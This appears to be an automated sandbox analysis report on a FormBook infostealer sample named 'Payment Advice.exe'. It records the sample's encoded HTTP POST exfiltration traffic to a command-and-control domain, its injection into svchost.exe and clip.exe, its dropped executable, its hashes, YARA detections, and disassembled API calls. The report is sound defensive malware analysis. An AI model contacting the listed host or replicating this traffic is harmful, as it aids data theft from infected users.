Aug 29, 2024 05:26:27.308032990 CEST	775	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 205 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 7a 51 6a 6d 74 6d 37 50 4f 64 61 34 4f 77 70 6f 47 51 67 33 59 65 2f 37 2f 66 7a 54 32 5a 31 41 51 3d 3d Data Ascii: kbRxoVY0=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDzQjmtm7POda4OwpoGQg3Ye/7/fzT2Z1AQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49771	172.67.210.102	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:26:29.841054916 CEST	795	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 225 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 36 4d 6d 34 57 48 65 31 6b 38 62 54 64 68 77 31 6a 70 2b 74 6f 76 4c 7a 44 76 79 2b 6e 43 43 62 6b 3d Data Ascii: kbRxoVY0=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY6Mm4WHe1k8bTdhw1jp+tovLzDvy+nCCbk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49772	172.67.210.102	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:26:32.375554085 CEST	10877	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10305 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 52 75 79 38 73 52 6c 7a 42 30 2f 4b 6d 76 6d 34 61 30 66 6d 45 36 58 45 56 48 2b 41 7a 76 68 65 49 57 44 78 7a 6b 33 4c 72 57 54 62 4a 75 77 70 38 33 5a 33 4e 4f 59 62 77 38 72 33 58 44 71 41 45 78 63 73 4e 6e 51 6d 55 76 59 72 47 39 39 53 47 6a 61 55 39 47 47 58 6e 34 65 4c 62 48 42 50 45 67 68 66 48 34 49 42 37 72 6b 61 78 57 33 6d 72 57 5a 57 69 2f 59 46 31 63 52 75 37 59 2f 62 4a 63 4a 68 79 46 62 54 5a 44 42 6e 2b 55 30 51 69 42 66 2f 52 76 62 58 61 75 34 50 4e 73 78 [TRUNCATED] Data Ascii: kbRxoVY0=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAORuy8sRlzB0/Kmvm4a0fmE6XEVH+AzvheIWDxzk3LrWTbJuwp83Z3NOYbw8r3XDqAExcsNnQmUvYrG99SGjaU9GGXn4eLbHBPEghfH4IB7rkaxW3mrWZWi/YF1cRu7Y/bJcJhyFbTZDBn+U0QiBf/RvbXau4PNsxAHJT0B4EMIa9ZfzW01DxfFzZ6r0RX4/5hH1St9W01BIjSe8bgTUd3nHUn+tuYmg/ucZcMybVRBp5KP/91y45L1OXuthnjqy9KKpZvrIyq7Ki2EORYo1CcwLn2tr6/pYFN/YwjTVmQ+aRuwyfFDZBSgbPfqZk80KIQxAkR8X02Q4aLGsWH2phSyydG6xPWhm+Zg64kVQwnupGX+q+qqPl+ThfD2QoL51miY/+57uidmWr8Qz/6e/WaozNJLbtZsHIArN7oxSsFUADytqgUGbC98qx5hYk7U2tNvkvG/cYzY53GRgrYM2sAGRB1IcgVqRoCAUqSlQKZvvsxOY9IqoJLUXfDEVPUsjrIgXvO3Piz70JWGdUmTUY2zj1qDR2ScpGfypKyhtqMf8Rx6uDFkSAMEDmZpy+/2VBX00JWjqic5fzxuAltDxhDfhrkwcKLl13ul5oWk4dqYk1bbGU8MYS3pGMU2RVucW6Q8D/RV0unDMzTUPCPJB/2+TSleJ+zgdcfk3utst5sWwAzT/bDbLvTmwawRUVjvxL+AaWkm5kpmCtwa+UWppQUGJwj/iibIPbj3WwaaMqkJiGay+ttLcx407CrZ90SfpvPIMoR1ImiA0ArbEbAgvKXIKCt9TVWIx4364ILTavhqsNMr4xpoEcMbcmVtnc1w5Kfz [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49773	172.67.210.102	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:26:34.923504114 CEST	503	OUT	GET /lfkn/?kbRxoVY0=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&DnUL=_290s HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.dmtxwuatbz.cc Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Target ID:	0
Start time:	23:22:54
Start date:	28/08/2024
Path:	C:\Users\user\Desktop\Payment Advice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment Advice.exe"
Imagebase:	0x580000
File size:	1'170'944 bytes
MD5 hash:	2F66C56F11963A398518CEE0DDE2C123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:22:55
Start date:	28/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment Advice.exe"
Imagebase:	0x9d0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:23:06
Start date:	28/08/2024
Path:	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe"
Imagebase:	0x2e0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	23:23:07
Start date:	28/08/2024
Path:	C:\Windows\SysWOW64\clip.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\clip.exe"
Imagebase:	0x2b0000
File size:	24'576 bytes
MD5 hash:	E40CB198EBCD20CD16739F670D4D7B74
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	23:23:21
Start date:	28/08/2024
Path:	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe"
Imagebase:	0x2e0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	23:23:32
Start date:	28/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	52

Executed Functions

Function 005AB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d57ae4e93c15a6cea8b9d6382bd602ebc7a1d01b729e463cad13bbebda4111a3
Instruction ID: 20b3847a24d0715fd92beda38a2b13ff3bd3f0fca304933a38819fef52c501fc
Opcode Fuzzy Hash: d57ae4e93c15a6cea8b9d6382bd602ebc7a1d01b729e463cad13bbebda4111a3
Instruction Fuzzy Hash: 9C324F75B022299BEB248F54DC456EDBBB5FF4B310F1841D9E40AA7A42D7349E80CF92

Function 00583D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00583AA3,?), ref: 00583D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00583AA3,?), ref: 00583D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00641148,00641130,?,?,?,?,00583AA3,?), ref: 00583DC8

Part of subcall function 00586430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00583DEE,00641148,?,?,?,?,?,00583AA3,?), ref: 00586471

SetCurrentDirectoryW.KERNEL32(?,?,?,00583AA3,?), ref: 00583E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006328F4,00000010), ref: 005F1CCE
SetCurrentDirectoryW.KERNEL32(?,00641148,?,?,?,?,?,00583AA3,?), ref: 005F1D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0061DAB4,00641148,?,?,?,?,?,00583AA3,?), ref: 005F1D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00583AA3), ref: 005F1D90

Part of subcall function 00583E6E: GetSysColorBrush.USER32(0000000F), ref: 00583E79
Part of subcall function 00583E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00583E88
Part of subcall function 00583E6E: LoadIconW.USER32(00000063), ref: 00583E9E
Part of subcall function 00583E6E: LoadIconW.USER32(000000A4), ref: 00583EB0
Part of subcall function 00583E6E: LoadIconW.USER32(000000A2), ref: 00583EC2
Part of subcall function 00583E6E: RegisterClassExW.USER32(?), ref: 00583F30

Part of subcall function 005836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005836E6
Part of subcall function 005836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00583707
Part of subcall function 005836B8: ShowWindow.USER32(00000000,?,?,?,?,00583AA3,?), ref: 0058371B
Part of subcall function 005836B8: ShowWindow.USER32(00000000,?,?,?,?,00583AA3,?), ref: 00583724

Part of subcall function 00584FFC: _memset.LIBCMT ref: 00585022
Part of subcall function 00584FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005850CB

Strings

runas, xrefs: 005F1D84
()c, xrefs: 005F1D49
This is a third-party compiled AutoIt script., xrefs: 005F1CC8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()c$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-2388337645
Opcode ID: 46c49bc0993ccbfb80332f65a873b277ea31cf29b056e23f3c6a02cf95338395
Instruction ID: 824c0ff94883cd23cacf591c167a98c4bfed459cf0c95e6adb65d8bc6475266b
Opcode Fuzzy Hash: 46c49bc0993ccbfb80332f65a873b277ea31cf29b056e23f3c6a02cf95338395
Instruction Fuzzy Hash: 7051373494424AAACB01BBF0DC1AEAE7F7ABB47B04F004164FA0177192DA344A85CB21

Function 0059DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0059DDEC
GetCurrentProcess.KERNEL32(00000000,0061DC38,?,?), ref: 0059DEAC
GetNativeSystemInfo.KERNELBASE(?,0061DC38,?,?), ref: 0059DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0059DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0059DF1F
GetSystemInfo.KERNEL32(?,0061DC38,?,?), ref: 0059DF29
GetSystemInfo.KERNEL32(?,0061DC38,?,?), ref: 0059DF35

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 71ef2fecda3c5d62b00a0d00bf2316000a9576548bd8782373171f39185b03ab
Instruction ID: a93a190cab0e36ba24ce31866d4759e897d32d2eaa993581dcb81164dcfcbac3
Opcode Fuzzy Hash: 71ef2fecda3c5d62b00a0d00bf2316000a9576548bd8782373171f39185b03ab
Instruction Fuzzy Hash: 4E61C2B180A384CFCF15CF6898C51E9BFB4BF69300F1989D9D8459F24BC668C909CB65

Function 0058406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0058449E,?,?,00000000,00000001), ref: 0058407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0058449E,?,?,00000000,00000001), ref: 00584092
LoadResource.KERNEL32(?,00000000,?,?,0058449E,?,?,00000000,00000001,?,?,?,?,?,?,005841FB), ref: 005F4F1A
SizeofResource.KERNEL32(?,00000000,?,?,0058449E,?,?,00000000,00000001,?,?,?,?,?,?,005841FB), ref: 005F4F2F
LockResource.KERNEL32(0058449E,?,?,0058449E,?,?,00000000,00000001,?,?,?,?,?,?,005841FB,00000000), ref: 005F4F42

Strings

SCRIPT, xrefs: 00584088

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 4f1659250a91e0f69d2fcf34d77a3c9cd37d040b12f448024ee0d879e1ab93c4
Instruction ID: 18be42a77d72f0da91130b80d797fafe3682391c59a4363e77657a09d36fc492
Opcode Fuzzy Hash: 4f1659250a91e0f69d2fcf34d77a3c9cd37d040b12f448024ee0d879e1ab93c4
Instruction Fuzzy Hash: D5113C71240701BFE7219B65EC48F677BBAFBC5B55F10866CFA029A2A0DB71DD008A20

Function 00593B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

d, xrefs: 005940EC
d, xrefs: 005940A4
d, xrefs: 005F701F
@, xrefs: 00594176

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ d$ d$ d
API String ID: 3728558374-517746275
Opcode ID: 0ddc77f18d518bcfa667717e3943abfb05d09845b10e3c18df0eb46e83084814
Instruction ID: 9c31f8d0d09667fa0ff46f09d7b1dfd480600047d044d87268d01ccb4cea1338
Opcode Fuzzy Hash: 0ddc77f18d518bcfa667717e3943abfb05d09845b10e3c18df0eb46e83084814
Instruction Fuzzy Hash: 53729B3490420AEFCF14DF94C495ABEBFB6FF48300F14845AE919AB291D735AE45CB91

Function 005C6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,005F2F49), ref: 005C6CB9
FindFirstFileW.KERNELBASE(?,?), ref: 005C6CCA
FindClose.KERNEL32(00000000), ref: 005C6CDA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 5eec967b253291a7405fe4e6230188f5f35fbf91abb3f00edcd6fa6881453940
Instruction ID: 8416d1188c5e286d57b1be56f81b289604651106f8b8550dbe5a5e9d0954ba88
Opcode Fuzzy Hash: 5eec967b253291a7405fe4e6230188f5f35fbf91abb3f00edcd6fa6881453940
Instruction Fuzzy Hash: 51E0D8318504105BC31067B8EC0D8EB3B6DEE05339F100749F471C11D0EB74DE0045D5

Function 00593200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

d, xrefs: 005F933E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BuffCharUpper
String ID: d
API String ID: 3964851224-996808063
Opcode ID: b414a5d24bb14545e41c004cb6e397f78b7881834eb59abaf22bc6bcdd69fc4f
Instruction ID: 6e64766f4e1893f26ee59eca45a54adca921294e63e9e0b06d89e19c00dcf804
Opcode Fuzzy Hash: b414a5d24bb14545e41c004cb6e397f78b7881834eb59abaf22bc6bcdd69fc4f
Instruction Fuzzy Hash: 8D924A70608342DFDB24DF18C484B6ABBE5BF88304F14885DE99A8B362D775ED45CB52

Function 0058E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0058E959
timeGetTime.WINMM ref: 0058EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0058ED2E
